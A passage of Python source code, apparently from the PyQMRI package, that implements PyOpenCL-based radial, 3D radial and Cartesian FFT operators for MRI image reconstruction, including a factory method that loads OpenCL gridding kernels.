        The context for the PyOpenCL computations.
    queue : PyOpenCL.Queue
        The computation Queue for the PyOpenCL kernels.
    fft_dim : tuple of int
        The dimensions to take the fft over
    DTYPE : Numpy.dtype
        The complex precision type. Currently complex64 is used.
    DTYPE_real : Numpy.dtype
        The real precision type. Currently float32 is used.

    Attributes
    ----------
    DTYPE : Numpy.dtype
        The complex precision type. Currently complex64 is used.
    DTYPE_real : Numpy.dtype
        The real precision type. Currently float32 is used.
    ctx : PyOpenCL.Context
        The context for the PyOpenCL computations.
    queue : PyOpenCL.Queue
        The computation Queue for the PyOpenCL kernels.
    prg : PyOpenCL.Program
        The PyOpenCL Program Object containing the compiled kernels.
        Set to None here; the factory compiles and attaches it.
    fft_dim : tuple of int
        The dimensions to take the fft over
    """

    def __init__(self, ctx, queue, fft_dim, DTYPE, DTYPE_real):
        self.DTYPE = DTYPE
        self.DTYPE_real = DTYPE_real
        self.ctx = ctx
        self.queue = queue
        self.prg = None
        self.fft_dim = fft_dim

    @staticmethod
    def create(ctx,
               queue,
               par,
               kwidth=5,
               klength=1000,
               DTYPE=np.complex64,
               DTYPE_real=np.float32,
               radial=False,
               SMS=False,
               streamed=False):
        """FFT factory method.

        Based on the inputs this method decides which FFT object should be
        returned.

        Parameters
        ----------
        ctx : PyOpenCL.Context
            The context for the PyOpenCL computations.
        queue : PyOpenCL.Queue
            The computation Queue for the PyOpenCL kernels.
        par : dict
            A python dict containing the necessary information to setup the
            object. Needs to contain the number of slices (NSlice), number of
            scans (NScan), image dimensions (dimX, dimY), number of coils (NC),
            sampling points (N) and read outs (NProj) a PyOpenCL queue (queue)
            and the complex coil sensitivities (C).
        kwidth : int, 5
            The width of the sampling kernel for regridding of non-uniform
            kspace samples.
        klength : int, 1000
            The length of the kernel lookup table which samples the continuous
            gridding kernel.
        DTYPE : Numpy.dtype, numpy.complex64
            The complex precision type. Currently complex64 is used.
        DTYPE_real : Numpy.dtype, numpy.float32
            The real precision type. Currently float32 is used.
        radial : bool, False
            Switch for Cartesian (False) and non-Cartesian (True) FFT.
        SMS : bool, False
            Switch between Simultaneous Multi Slice reconstruction (True) and
            simple slice by slice reconstruction.
        streamed : bool, False
            Switch between normal reconstruction in one big block versus
            streamed reconstruction of smaller blocks.

        Returns
        -------
        PyOpenCLnuFFT object:
            The setup FFT object.

        Raises
        ------
        AssertionError:
            If the Combination of passed flags to choose the
            FFT aren't compatible with each other. E.g.: Radial and SMS True.
        NotImplementedError:
            If 3D non-Cartesian and streamed are requested together.
        """
        # The explicit `is True`/`is False` checks are kept from the
        # original implementation to preserve its exact semantics for
        # non-bool truthy arguments.
        if radial is True and SMS is False:
            if par["is3D"]:
                if streamed:
                    raise NotImplementedError(
                        "3D non-cartesian and streamed not implemented")
                obj = PyOpenCL3DRadialNUFFT(
                    ctx,
                    queue,
                    par,
                    kwidth=kwidth,
                    klength=klength,
                    DTYPE=DTYPE,
                    DTYPE_real=DTYPE_real)
            else:
                obj = PyOpenCLRadialNUFFT(
                    ctx,
                    queue,
                    par,
                    kwidth=kwidth,
                    klength=klength,
                    DTYPE=DTYPE,
                    DTYPE_real=DTYPE_real,
                    streamed=streamed)
        elif SMS is True and radial is False:
            obj = PyOpenCLSMSNUFFT(
                ctx,
                queue,
                par,
                DTYPE=DTYPE,
                DTYPE_real=DTYPE_real,
                streamed=streamed)
        elif SMS is False and radial is False:
            obj = PyOpenCLCartNUFFT(
                ctx,
                queue,
                par,
                DTYPE=DTYPE,
                DTYPE_real=DTYPE_real,
                streamed=streamed)
        else:
            raise AssertionError("Combination of Radial "
                                 "and SMS not allowed")
        # Select the matching OpenCL gridding kernel source. The file name
        # depends only on (streamed, precision); the original code
        # duplicated this open/compile logic in four branches and left the
        # file handle unclosed on some paths. `with` guarantees the close.
        if DTYPE == np.complex128:
            print('Using double precision')
            precision = 'double'
        else:
            print('Using single precision')
            precision = 'single'
        layout = 'slicefirst_' if streamed else ''
        kernel_path = resource_filename(
            'pyqmri', 'kernels/OpenCL_gridding_' + layout + precision + '.c')
        with open(kernel_path) as kernel_src:
            obj.prg = Program(
                obj.ctx,
                kernel_src.read())
        return obj
class PyOpenCLRadialNUFFT(PyOpenCLnuFFT):
    """Non-uniform FFT object.

    This class performs the non-uniform FFT (NUFFT) operation. Linear
    interpolation of a sampled gridding kernel is used to regrid points
    from the non-cartesian grid back on the cartesian grid.

    Parameters
    ----------
    ctx : PyOpenCL.Context
        The context for the PyOpenCL computations.
    queue : PyOpenCL.Queue
        The computation Queue for the PyOpenCL kernels.
    par : dict
        A python dict containing the necessary information to
        setup the object. Needs to contain the number of slices (NSlice),
        number of scans (NScan), image dimensions (dimX, dimY), number of
        coils (NC), sampling points (N) and read outs (NProj)
        a PyOpenCL queue (queue) and the complex coil
        sensitivities (C).
    kwidth : int
        The width of the sampling kernel for regridding of non-uniform
        kspace samples.
    klength : int
        The length of the kernel lookup table which samples the continuous
        gridding kernel.
    DTYPE : Numpy.dtype
        The complex precision type. Currently complex64 is used.
    DTYPE_real : Numpy.dtype
        The real precision type. Currently float32 is used.

    Attributes
    ----------
    traj : PyOpenCL.Array
        The complex sampling trajectory
    dcf : PyOpenCL.Array
        The density compensation function
    ogf (float):
        The overgriddingfactor for non-cartesian k-spaces.
    fft_shape : tuple of ints
        3 dimensional tuple. Dim 0 contains all Scans, Coils and Slices.
        Dim 1 and 2 the overgridded image dimensions.
    fft_scale : float32
        The scaling factor to achieve a good adjointness of the forward and
        backward FFT.
    cl_kerneltable (PyOpenCL.Buffer):
        The gridding lookup table as read only Buffer
    cl_deapo (PyOpenCL.Buffer):
        The deapodization lookup table as read only Buffer
    par_fft : int
        The number of parallel fft calls. Typically it iterates over the
        Scans.
    fft : gpyfft.fft.FFT
        The fft object created from gpyfft (A wrapper for clFFT). The object
        is created only once and reused in each iteration, iterating over
        all scans to keep the memory footprint low.
    prg : PyOpenCL.Program
        The PyOpenCL.Program object containing the necessary kernels to
        execute the linear Operator. This will be determined by the
        factory and set after the object is created.
    """

    def __init__(
            self,
            ctx,
            queue,
            par,
            kwidth=5,
            klength=200,
            DTYPE=np.complex64,
            DTYPE_real=np.float32,
            streamed=False):
        super().__init__(ctx, queue, par["fft_dim"], DTYPE, DTYPE_real)
        self.ogf = par["ogf"]
        # Streamed mode works on blocks of par_slices (+overlap) slices;
        # otherwise all NSlice slices are batched into dim 0 at once.
        if streamed:
            self.fft_shape = (
                par["NScan"] *
                par["NC"] *
                (par["par_slices"] + par["overlap"]),
                int(round(par["dimY"]*self.ogf)),
                int(round(par["dimX"]*self.ogf)))
        else:
            self.fft_shape = (
                par["NScan"] *
                par["NC"] *
                par["NSlice"],
                int(round(par["dimY"]*self.ogf)),
                int(round(par["dimX"]*self.ogf)))
        # sqrt(N) normalization over the transformed axes so forward and
        # adjoint FFT form an adjoint pair.
        self.fft_scale = DTYPE_real(
            np.sqrt(np.prod(self.fft_shape[self.fft_dim[0]:])))
        (kerneltable, kerneltable_FT) = calckbkernel(
            kwidth, self.ogf, par["N"], klength)
        # Deapodization table: pointwise inverse of the gridding kernel's
        # Fourier transform.
        deapo = 1 / kerneltable_FT.astype(DTYPE_real)
        self.cl_kerneltable = cl.Buffer(
            self.ctx,
            cl.mem_flags.READ_ONLY | cl.mem_flags.COPY_HOST_PTR,
            hostbuf=kerneltable.astype(DTYPE_real).data)
        self.cl_deapo = cl.Buffer(
            self.ctx,
            cl.mem_flags.READ_ONLY | cl.mem_flags.COPY_HOST_PTR,
            hostbuf=deapo.data)
        self.dcf = clarray.to_device(self.queue, par["dcf"])
        self.traj = clarray.to_device(self.queue, par["traj"])
        # Scratch array holding the overgridded Cartesian k-space between
        # the gridding and FFT stages.
        self._tmp_fft_array = (
            clarray.zeros(
                self.queue,
                (self.fft_shape),
                dtype=DTYPE))
        # On GPU the FFT is batched per scan to bound device memory; on
        # CPU everything is transformed in a single call.
        if par["use_GPU"]:
            self.par_fft = int(
                self.fft_shape[0] / par["NScan"])
        else:
            self.par_fft = self.fft_shape[0]
        self.iternumber = int(self.fft_shape[0]/self.par_fft)
        # The gpyfft plan is built once for one batch and reused for every
        # batch (in-place: out_array is the same slice).
        self.fft = FFT(ctx, queue, self._tmp_fft_array[
            0:self.par_fft, ...],
                       out_array=self._tmp_fft_array[
                           0:self.par_fft, ...],
                       axes=self.fft_dim)
        self._kernelpoints = kerneltable.size
        self._kwidth = kwidth / 2
        # Alternating +1/-1 vector consumed by the fftshift kernel;
        # presumably implements fftshift by modulation rather than data
        # movement -- TODO confirm against the OpenCL kernel source.
        self._check = np.ones(self.fft_shape[-1], dtype=DTYPE_real)
        self._check[1::2] = -1
        self._check = clarray.to_device(self.queue, self._check)
        self._gridsize = self.fft_shape[-1]

    def __del__(self):
        """Explicitly delete OpenCL Objects.

        Dropping the references lets PyOpenCL release the associated
        device memory deterministically.
        """
        del self.traj
        del self.dcf
        del self._tmp_fft_array
        del self.cl_kerneltable
        del self.cl_deapo
        del self._check
        del self.queue
        del self.ctx
        del self.prg
        del self.fft

    def FFTH(self, sg, s, wait_for=None, scan_offset=0):
        """Perform the inverse (adjoint) NUFFT operation.

        Pipeline: zero scratch -> grid non-Cartesian samples onto the
        overgridded Cartesian grid -> (shift, inverse FFT, shift) ->
        deapodize and crop into the image array ``sg``.

        Parameters
        ----------
        sg : PyOpenCL.Array
            The complex image data.
        s : PyOpenCL.Array
            The non-uniformly gridded k-space
        wait_for : list of PyopenCL.Event, None
            A List of PyOpenCL events to wait for.
        scan_offset : int, 0
            Offset compared to the first acquired scan.

        Returns
        -------
        PyOpenCL.Event: A PyOpenCL event to wait for.
        """
        if wait_for is None:
            wait_for = []
        # Zero tmp arrays
        self._tmp_fft_array.add_event(
            self.prg.zero_tmp(
                self.queue,
                (self._tmp_fft_array.size,
                 ),
                None,
                self._tmp_fft_array.data,
                wait_for=self._tmp_fft_array.events))
        # Grid k-space
        self._tmp_fft_array.add_event(
            self.prg.grid_lut(
                self.queue,
                (s.shape[0], s.shape[1] * s.shape[2],
                 s.shape[-2] * self._gridsize),
                None,
                self._tmp_fft_array.data,
                s.data,
                self.traj.data,
                np.int32(self._gridsize),
                np.int32(sg.shape[2]),
                self.DTYPE_real(self._kwidth),
                self.dcf.data,
                self.cl_kerneltable,
                np.int32(self._kernelpoints),
                np.int32(scan_offset),
                wait_for=(wait_for +
                          s.events + self._tmp_fft_array.events)))
        # FFT: pre-shift, batched inverse clFFT, post-shift
        self._tmp_fft_array.add_event(
            self.prg.fftshift(
                self.queue,
                (self.fft_shape[0],
                 self.fft_shape[1],
                 self.fft_shape[2]),
                None,
                self._tmp_fft_array.data,
                self._check.data,
                wait_for=self._tmp_fft_array.events))
        # Host-side sync before handing the buffer to gpyfft, which
        # manages its own event dependencies.
        cl.wait_for_events(self._tmp_fft_array.events)
        fft_events = []
        for j in range(self.iternumber):
            fft_events.append(self.fft.enqueue_arrays(
                data=self._tmp_fft_array[
                    j * self.par_fft:(j + 1) * self.par_fft, ...],
                result=self._tmp_fft_array[
                    j * self.par_fft:(j + 1) * self.par_fft, ...],
                forward=False)[0])
        self._tmp_fft_array.add_event(
            self.prg.fftshift(
                self.queue,
                (self.fft_shape[0],
                 self.fft_shape[1],
                 self.fft_shape[2]),
                None,
                self._tmp_fft_array.data,
                self._check.data,
                wait_for=fft_events))
        # Deapodization also crops the overgridded result back to the
        # image dimensions and applies fft_scale.
        return self.prg.deapo_adj(
            self.queue,
            (sg.shape[0] * sg.shape[1] *
             sg.shape[2], sg.shape[3], sg.shape[4]),
            None,
            sg.data,
            self._tmp_fft_array.data,
            self.cl_deapo,
            np.int32(self._tmp_fft_array.shape[-1]),
            self.DTYPE_real(self.fft_scale),
            self.DTYPE_real(self.ogf),
            wait_for=(wait_for + sg.events +
                      self._tmp_fft_array.events))

    def FFT(self, s, sg, wait_for=None, scan_offset=0):
        """Perform the forward NUFFT operation.

        Pipeline: zero scratch -> deapodize/scale the image into the
        overgridded grid -> (shift, forward FFT, shift) -> resample onto
        the non-Cartesian trajectory into ``s``.

        Parameters
        ----------
        s : PyOpenCL.Array
            The non-uniformly gridded k-space.
        sg : PyOpenCL.Array
            The complex image data.
        wait_for : list of PyopenCL.Event, None
            A List of PyOpenCL events to wait for.
        scan_offset : int, 0
            Offset compared to the first acquired scan.

        Returns
        -------
        PyOpenCL.Event: A PyOpenCL event to wait for.
        """
        if wait_for is None:
            wait_for = []
        # Zero tmp arrays
        self._tmp_fft_array.add_event(
            self.prg.zero_tmp(
                self.queue,
                (self._tmp_fft_array.size,
                 ),
                None,
                self._tmp_fft_array.data,
                wait_for=self._tmp_fft_array.events))
        # Deapodization and Scaling
        self._tmp_fft_array.add_event(
            self.prg.deapo_fwd(
                self.queue,
                (sg.shape[0] * sg.shape[1] * sg.shape[2],
                 sg.shape[3], sg.shape[4]),
                None,
                self._tmp_fft_array.data,
                sg.data,
                self.cl_deapo,
                np.int32(self._tmp_fft_array.shape[-1]),
                self.DTYPE_real(1 / self.fft_scale),
                self.DTYPE_real(self.ogf),
                wait_for=wait_for + sg.events + self._tmp_fft_array.events))
        # FFT: pre-shift, batched forward clFFT, post-shift
        self._tmp_fft_array.add_event(
            self.prg.fftshift(
                self.queue,
                (self.fft_shape[0],
                 self.fft_shape[1],
                 self.fft_shape[2]),
                None,
                self._tmp_fft_array.data,
                self._check.data,
                wait_for=self._tmp_fft_array.events))
        # Host-side sync before handing the buffer to gpyfft.
        cl.wait_for_events(self._tmp_fft_array.events)
        fft_events = []
        for j in range(self.iternumber):
            fft_events.append(self.fft.enqueue_arrays(
                data=self._tmp_fft_array[
                    j * self.par_fft:(j + 1) * self.par_fft, ...],
                result=self._tmp_fft_array[
                    j * self.par_fft:(j + 1) * self.par_fft, ...],
                forward=True)[0])
        self._tmp_fft_array.add_event(
            self.prg.fftshift(
                self.queue,
                (self.fft_shape[0],
                 self.fft_shape[1],
                 self.fft_shape[2]),
                None,
                self._tmp_fft_array.data,
                self._check.data,
                wait_for=fft_events))
        # Resample on Spoke
        return self.prg.invgrid_lut(
            self.queue,
            (s.shape[0], s.shape[1] * s.shape[2], s.shape[-2] *
             self._gridsize),
            None,
            s.data,
            self._tmp_fft_array.data,
            self.traj.data,
            np.int32(self._gridsize),
            np.int32(s.shape[2]),
            self.DTYPE_real(self._kwidth),
            self.dcf.data,
            self.cl_kerneltable,
            np.int32(self._kernelpoints),
            np.int32(scan_offset),
            wait_for=s.events + wait_for + self._tmp_fft_array.events)
class PyOpenCL3DRadialNUFFT(PyOpenCLnuFFT):
    """Non-uniform FFT object.

    This class performs the 3D non-uniform FFT (NUFFT) operation. Linear
    interpolation of a sampled gridding kernel is used to regrid points
    from the non-cartesian grid back on the cartesian grid.

    Parameters
    ----------
    ctx : PyOpenCL.Context
        The context for the PyOpenCL computations.
    queue : PyOpenCL.Queue
        The computation Queue for the PyOpenCL kernels.
    par : dict
        A python dict containing the necessary information to
        setup the object. Needs to contain the number of slices (NSlice),
        number of scans (NScan), image dimensions (dimX, dimY), number of
        coils (NC), sampling points (N) and read outs (NProj)
        a PyOpenCL queue (queue) and the complex coil
        sensitivities (C).
    kwidth : int
        The width of the sampling kernel for regridding of non-uniform
        kspace samples.
    klength : int
        The length of the kernel lookup table which samples the continuous
        gridding kernel.
    DTYPE : Numpy.dtype
        The complex precision type. Currently complex64 is used.
    DTYPE_real : Numpy.dtype
        The real precision type. Currently float32 is used.

    Attributes
    ----------
    traj : PyOpenCL.Array
        The complex sampling trajectory
    dcf : PyOpenCL.Array
        The density compensation function
    ogf (float):
        The overgriddingfactor for non-cartesian k-spaces.
    fft_shape : tuple of ints
        4 dimensional tuple. Dim 0 contains all Scans and Coils.
        Dim 1 to 3 the overgridded volume dimensions.
    fft_scale : float32
        The scaling factor to achieve a good adjointness of the forward and
        backward FFT.
    cl_kerneltable (PyOpenCL.Buffer):
        The gridding lookup table as read only Buffer
    cl_deapo (PyOpenCL.Buffer):
        The deapodization lookup table as read only Buffer
    par_fft : int
        The number of parallel fft calls. Typically it iterates over the
        Scans.
    fft : gpyfft.fft.FFT
        The fft object created from gpyfft (A wrapper for clFFT). The object
        is created only once and reused in each iteration, iterating over
        all scans to keep the memory footprint low.
    prg : PyOpenCL.Program
        The PyOpenCL.Program object containing the necessary kernels to
        execute the linear Operator. This will be determined by the
        factory and set after the object is created.
    """

    def __init__(
            self,
            ctx,
            queue,
            par,
            kwidth=5,
            klength=200,
            DTYPE=np.complex64,
            DTYPE_real=np.float32,
            streamed=False):
        # NOTE: `streamed` is accepted for signature compatibility with the
        # 2D variant; no streamed fft_shape branch exists here (the factory
        # raises NotImplementedError for streamed 3D).
        super().__init__(ctx, queue, par["fft_dim"], DTYPE, DTYPE_real)
        # self.ogf = par["N"]/par["dimX"]
        self.ogf = par["ogf"]
        # 4D shape: scans*coils batched in dim 0, overgridded volume in
        # dims 1-3 (slices are part of the transform here, unlike in 2D).
        self.fft_shape = (
            par["NScan"] *
            par["NC"],
            int(round(par["NSlice"]*self.ogf)),
            int(round(par["dimY"]*self.ogf)),
            int(round(par["dimX"]*self.ogf)))
        # sqrt(N) normalization over the three transformed axes.
        self.fft_scale = DTYPE_real(
            np.sqrt(np.prod(self.fft_shape[-3:])))
        (kerneltable, kerneltable_FT) = calckbkernel(
            kwidth, self.ogf, par["N"], klength)
        # Deapodization table: pointwise inverse of the gridding kernel's
        # Fourier transform.
        deapo = 1 / kerneltable_FT.astype(DTYPE_real)
        self.cl_kerneltable = cl.Buffer(
            self.ctx,
            cl.mem_flags.READ_ONLY | cl.mem_flags.COPY_HOST_PTR,
            hostbuf=kerneltable.astype(DTYPE_real).data)
        self.cl_deapo = cl.Buffer(
            self.ctx,
            cl.mem_flags.READ_ONLY | cl.mem_flags.COPY_HOST_PTR,
            hostbuf=deapo.data)
        self.dcf = clarray.to_device(self.queue, par["dcf"])
        self.traj = clarray.to_device(self.queue, par["traj"])
        # Scratch array holding the overgridded Cartesian k-space volume.
        self._tmp_fft_array = (
            clarray.zeros(
                self.queue,
                (self.fft_shape),
                dtype=DTYPE))
        # On GPU the FFT is batched per scan to bound device memory; on
        # CPU everything is transformed in a single call.
        if par["use_GPU"]:
            self.par_fft = int(
                self.fft_shape[0] / par["NScan"])
        else:
            self.par_fft = self.fft_shape[0]
        self.iternumber = int(self.fft_shape[0]/self.par_fft)
        # One in-place gpyfft plan, reused for every batch.
        self.fft = FFT(ctx, queue, self._tmp_fft_array[
            0:self.par_fft, ...],
                       out_array=self._tmp_fft_array[
                           0:self.par_fft, ...],
                       axes=self.fft_dim)
        self._kernelpoints = kerneltable.size
        self._kwidth = kwidth / 2
        # Alternating +1/-1 vector consumed by the fftshift3D kernel;
        # presumably implements fftshift by modulation -- TODO confirm
        # against the OpenCL kernel source.
        self._check = np.ones(self.fft_shape[-1], dtype=DTYPE_real)
        self._check[1::2] = -1
        self._check = clarray.to_device(self.queue, self._check)
        self._gridsize = self.fft_shape[-1]

    def __del__(self):
        """Explicitly delete OpenCL Objects.

        Dropping the references lets PyOpenCL release the associated
        device memory deterministically.
        """
        del self.traj
        del self.dcf
        del self._tmp_fft_array
        del self.cl_kerneltable
        del self.cl_deapo
        del self._check
        del self.queue
        del self.ctx
        del self.prg
        del self.fft

    def FFTH(self, sg, s, wait_for=None, scan_offset=0):
        """Perform the inverse (adjoint) NUFFT operation.

        Pipeline: zero scratch -> 3D gridding -> (shift, inverse FFT,
        shift) -> deapodize/crop into the image array ``sg``.

        Parameters
        ----------
        sg : PyOpenCL.Array
            The complex image data.
        s : PyOpenCL.Array
            The non-uniformly gridded k-space
        wait_for : list of PyopenCL.Event, None
            A List of PyOpenCL events to wait for.
        scan_offset : int, 0
            Offset compared to the first acquired scan.

        Returns
        -------
        PyOpenCL.Event: A PyOpenCL event to wait for.
        """
        if wait_for is None:
            wait_for = []
        # Zero tmp arrays
        self._tmp_fft_array.add_event(
            self.prg.zero_tmp(
                self.queue,
                (self._tmp_fft_array.size,
                 ),
                None,
                self._tmp_fft_array.data,
                wait_for=self._tmp_fft_array.events))
        # Grid k-space
        self._tmp_fft_array.add_event(
            self.prg.grid_lut3D(
                self.queue,
                (s.shape[0], s.shape[1],
                 s.shape[-2] * self._gridsize),
                None,
                self._tmp_fft_array.data,
                s.data,
                self.traj.data,
                np.int32(self._gridsize),
                np.int32(sg.shape[2]),
                self.DTYPE_real(self._kwidth),
                self.dcf.data,
                self.cl_kerneltable,
                np.int32(self._kernelpoints),
                np.int32(scan_offset),
                wait_for=(wait_for +
                          s.events + self._tmp_fft_array.events)))
        # FFT: pre-shift, batched inverse clFFT, post-shift
        self._tmp_fft_array.add_event(
            self.prg.fftshift3D(
                self.queue,
                (np.prod(self.fft_shape[:2]),
                 self.fft_shape[2],
                 self.fft_shape[3]),
                None,
                self._tmp_fft_array.data,
                self._check.data,
                wait_for=self._tmp_fft_array.events))
        # Host-side sync before handing the buffer to gpyfft.
        cl.wait_for_events(self._tmp_fft_array.events)
        fft_events = []
        for j in range(self.iternumber):
            fft_events.append(self.fft.enqueue_arrays(
                data=self._tmp_fft_array[
                    j * self.par_fft:(j + 1) * self.par_fft, ...],
                result=self._tmp_fft_array[
                    j * self.par_fft:(j + 1) * self.par_fft, ...],
                forward=False)[0])
        self._tmp_fft_array.add_event(
            self.prg.fftshift3D(
                self.queue,
                (np.prod(self.fft_shape[:2]),
                 self.fft_shape[2],
                 self.fft_shape[3]),
                None,
                self._tmp_fft_array.data,
                self._check.data,
                wait_for=fft_events))
        # Deapodization also crops the overgridded result back to the
        # image dimensions and applies fft_scale.
        return self.prg.deapo_adj3D(
            self.queue,
            (sg.shape[0] * sg.shape[1] *
             sg.shape[2], sg.shape[3], sg.shape[4]),
            None,
            sg.data,
            self._tmp_fft_array.data,
            self.cl_deapo,
            np.int32(self._tmp_fft_array.shape[-1]),
            self.DTYPE_real(self.fft_scale),
            self.DTYPE_real(self.ogf),
            wait_for=(wait_for + sg.events +
                      self._tmp_fft_array.events))

    def FFT(self, s, sg, wait_for=None, scan_offset=0):
        """Perform the forward NUFFT operation.

        Pipeline: zero scratch -> deapodize/scale the image -> (shift,
        forward FFT, shift) -> resample onto the 3D trajectory into ``s``.

        Parameters
        ----------
        s : PyOpenCL.Array
            The non-uniformly gridded k-space.
        sg : PyOpenCL.Array
            The complex image data.
        wait_for : list of PyopenCL.Event, None
            A List of PyOpenCL events to wait for.
        scan_offset : int, 0
            Offset compared to the first acquired scan.

        Returns
        -------
        PyOpenCL.Event: A PyOpenCL event to wait for.
        """
        if wait_for is None:
            wait_for = []
        # Zero tmp arrays
        self._tmp_fft_array.add_event(
            self.prg.zero_tmp(
                self.queue,
                (self._tmp_fft_array.size,
                 ),
                None,
                self._tmp_fft_array.data,
                wait_for=self._tmp_fft_array.events))
        # Deapodization and Scaling
        self._tmp_fft_array.add_event(
            self.prg.deapo_fwd3D(
                self.queue,
                (sg.shape[0] * sg.shape[1] * sg.shape[2],
                 sg.shape[3], sg.shape[4]),
                None,
                self._tmp_fft_array.data,
                sg.data,
                self.cl_deapo,
                np.int32(self._tmp_fft_array.shape[-1]),
                self.DTYPE_real(1 / self.fft_scale),
                self.DTYPE_real(self.ogf),
                wait_for=wait_for + sg.events + self._tmp_fft_array.events))
        # FFT: pre-shift, batched forward clFFT, post-shift
        self._tmp_fft_array.add_event(
            self.prg.fftshift3D(
                self.queue,
                (np.prod(self.fft_shape[:2]),
                 self.fft_shape[2],
                 self.fft_shape[3]),
                None,
                self._tmp_fft_array.data,
                self._check.data,
                wait_for=self._tmp_fft_array.events))
        # Host-side sync before handing the buffer to gpyfft.
        cl.wait_for_events(self._tmp_fft_array.events)
        fft_events = []
        for j in range(self.iternumber):
            fft_events.append(self.fft.enqueue_arrays(
                data=self._tmp_fft_array[
                    j * self.par_fft:(j + 1) * self.par_fft, ...],
                result=self._tmp_fft_array[
                    j * self.par_fft:(j + 1) * self.par_fft, ...],
                forward=True)[0])
        self._tmp_fft_array.add_event(
            self.prg.fftshift3D(
                self.queue,
                (np.prod(self.fft_shape[:2]),
                 self.fft_shape[2],
                 self.fft_shape[3]),
                None,
                self._tmp_fft_array.data,
                self._check.data,
                wait_for=fft_events))
        # Resample on Spoke
        return self.prg.invgrid_lut3D(
            self.queue,
            (s.shape[0], s.shape[1], s.shape[-2] *
             self._gridsize),
            None,
            s.data,
            self._tmp_fft_array.data,
            self.traj.data,
            np.int32(self._gridsize),
            np.int32(s.shape[2]),
            self.DTYPE_real(self._kwidth),
            self.dcf.data,
            self.cl_kerneltable,
            np.int32(self._kernelpoints),
            np.int32(scan_offset),
            wait_for=s.events + wait_for + self._tmp_fft_array.events)
class PyOpenCLCartNUFFT(PyOpenCLnuFFT):
    """Cartesian FFT object.

    This class performs the FFT operation.

    Parameters
    ----------
    ctx : PyOpenCL.Context
        The context for the PyOpenCL computations.
    queue : PyOpenCL.Queue
        The computation Queue for the PyOpenCL kernels.
    par : dict A python dict containing the necessary information to
        setup the object. Needs to contain the number of slices (NSlice),
        number of scans (NScan), image dimensions (dimX, dimY), number of
        coils (NC), sampling points (N) and read outs (NProj)
        a PyOpenCL queue (queue) and the complex coil
        sensitivities (C).
    DTYPE : Numpy.dtype
        The complex precision type. Currently complex64 is used.
    DTYPE_real : Numpy.dtype
        The real precision type. Currently float32 is used.

    Attributes
    ----------
    fft_shape : tuple of ints
        3 dimensional tuple. Dim 0 contains all Scans, Coils and Slices.
        Dim 1 and 2 the overgridded image dimensions.
    fft_scale : float32
        The scaling factor to achieve a good adjointness of the forward and
        backward FFT.
    par_fft : int
        The number of parallel fft calls. Typically it iterates over the
        Scans.
    fft : gpyfft.fft.FFT
        The fft object created from gpyfft (A wrapper for clFFT). The object
        is created only once and reused in each iteration, iterating over
        all scans to keep the memory footprint low.
    mask : PyOpenCL.Array
        The undersampling mask for the Cartesian grid.
    prg : PyOpenCL.Program
        The PyOpenCL.Program object containing the necessary kernels to
        execute the linear Operator. This will be determined by the
        factory and set after the object is created.
    """

    def __init__(
            self,
            ctx,
            queue,
            par,
            DTYPE=np.complex64,
            DTYPE_real=np.float32,
            streamed=False):
        super().__init__(ctx, queue, par["fft_dim"], DTYPE, DTYPE_real)
        # Streamed mode works on blocks of par_slices (+overlap) slices;
        # otherwise either a 4D (3D imaging) or flattened 3D shape is used.
        if streamed:
            self.fft_shape = (
                par["NScan"] *
                par["NC"] *
                (par["par_slices"] + par["overlap"]),
                par["dimY"],
                par["dimX"])
        else:
            if par["is3D"]:
                self.fft_shape = (
                    par["NScan"] *
                    par["NC"],
                    par["NSlice"],
                    par["dimY"],
                    par["dimX"])
            else:
                self.fft_shape = (
                    par["NScan"] *
                    par["NC"] *
                    par["NSlice"],
                    par["dimY"],
                    par["dimX"])
        # With fft_dim None the operator degenerates to a plain copy in
        # FFT/FFTH; none of the FFT machinery is set up in that case.
        if par["fft_dim"] is not None:
            # sqrt(N) normalization over the transformed axes.
            self.fft_scale = DTYPE_real(
                np.sqrt(np.prod(self.fft_shape[self.fft_dim[0]:])))
            self._tmp_fft_array = (
                clarray.zeros(
                    self.queue,
                    self.fft_shape,
                    dtype=DTYPE))
            # On GPU the FFT is batched per scan to bound device memory;
            # on CPU everything is transformed in a single call.
            if par["use_GPU"]:
                self.par_fft = int(
                    self.fft_shape[0] / par["NScan"])
            else:
                self.par_fft = self.fft_shape[0]
            self.iternumber = int(self.fft_shape[0]/self.par_fft)
            self.mask = clarray.to_device(self.queue, par["mask"])
            # One in-place gpyfft plan, reused for every batch.
            self.fft = FFT(ctx, queue, self._tmp_fft_array[
                0:self.par_fft, ...],
                           out_array=self._tmp_fft_array[
                               0:self.par_fft, ...],
                           axes=self.fft_dim)

    def __del__(self):
        """Explicitly delete OpenCL Objects.

        FFT-related attributes only exist when fft_dim was set, hence the
        guard mirrors __init__.
        """
        if self.fft_dim is not None:
            del self._tmp_fft_array
            del self.fft
            del self.mask
        del self.queue
        del self.ctx
        del self.prg

    def FFTH(self, sg, s, wait_for=None, scan_offset=0):
        """Perform the inverse (adjoint) FFT operation.

        With fft_dim set: apply the sampling mask, run the batched inverse
        FFT and scale into ``sg``. With fft_dim None: plain scaled copy of
        ``s`` into ``sg``.

        Parameters
        ----------
        sg : PyOpenCL.Array
            The complex image data.
        s : PyOpenCL.Array
            The uniformly gridded k-space
        wait_for : list of PyopenCL.Event, None
            A List of PyOpenCL events to wait for.
        scan_offset : int, 0
            Offset compared to the first acquired scan.

        Returns
        -------
        PyOpenCL.Event: A PyOpenCL event to wait for.
        """
        if wait_for is None:
            wait_for = []
        if self.fft_dim is not None:
            # Masked copy of the k-space into the scratch array.
            self._tmp_fft_array.add_event(
                self.prg.maskingcpy(
                    self.queue,
                    (self._tmp_fft_array.shape[0],
                     np.prod(self._tmp_fft_array.shape[1:])),
                    None,
                    self._tmp_fft_array.data,
                    s.data,
                    self.mask.data,
                    wait_for=s.events+self._tmp_fft_array.events+wait_for))
            # Host-side sync before handing the buffer to gpyfft.
            cl.wait_for_events(self._tmp_fft_array.events)
            fft_events = []
            for j in range(self.iternumber):
                fft_events.append(self.fft.enqueue_arrays(
                    data=self._tmp_fft_array[
                        j * self.par_fft:(j + 1) * self.par_fft, ...],
                    result=self._tmp_fft_array[
                        j * self.par_fft:(j + 1) * self.par_fft, ...],
                    forward=False)[0])
            return (
                self.prg.copy(
                    self.queue,
                    (sg.size,
                     ),
                    None,
                    sg.data,
                    self._tmp_fft_array.data,
                    self.DTYPE_real(
                        self.fft_scale),
                    wait_for=sg.events+fft_events))
        # fft_dim is None: identity (scale 1) copy, no FFT performed.
        return self.prg.copy(
            self.queue,
            (sg.size,
             ),
            None,
            sg.data,
            s.data,
            self.DTYPE_real(1),
            wait_for=s.events+sg.events+wait_for)

